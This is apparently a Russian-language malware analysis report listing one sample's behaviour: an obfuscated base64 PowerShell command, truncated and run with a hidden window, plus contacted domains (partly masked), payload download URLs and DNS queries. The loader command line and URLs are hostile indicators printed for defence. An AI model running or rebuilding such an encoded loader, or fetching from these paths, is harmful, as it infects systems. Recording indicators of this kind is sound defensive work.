Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4AZQB3AC0AbwBiAEoARQBDAFQAIABJAE8ALgBDAG8ATQBQAHIARQBzAHMAaQBPAG4ALgBEAGUARgBsAGEAdABlAHMAVABSAEUAYQBNACgAIABbAHMAWQBzAHQAZQBtAC4AaQBvAC4AbQBlAE0AbwByAHkAcwBUAFIARQBBAG0AXQAgAFsAUwBZAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\938096.cvr
- 'ir####wproduct.com':80
- 'ga###ndoza.com':80
- 'th###urland.com':80
- 'th###urland.com':443
- 'al####sign.com.my':80
- http://ir####wproduct.com/font/QVhA/
- http://ga###ndoza.com/cgi-bin/Lq/
- http://th###urland.com/wp-admin/h2L/
- http://al####sign.com.my/cgi-bin/VJCj/
- 'th###urland.com':443
- DNS ASK ir####wproduct.com
- DNS ASK ga###ndoza.com
- DNS ASK th###urland.com
- DNS ASK al####sign.com.my
- DNS ASK fa###le-sak.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4AZQB3AC0AbwBiAEoARQBDAFQAIABJAE8ALgBDAG8ATQBQAHIARQBzAHMAaQBPAG4ALgBEAGUARgBsAGEAdABlAHMAVABSAEUAYQBNACgAIABbAHMAWQBzAHQAZQBtAC4AaQBvAC4AbQBlAE0AbwByAHkAcwBUAFIARQBBAG0AXQAgAFsAUwBZAF...' (со скрытым окном)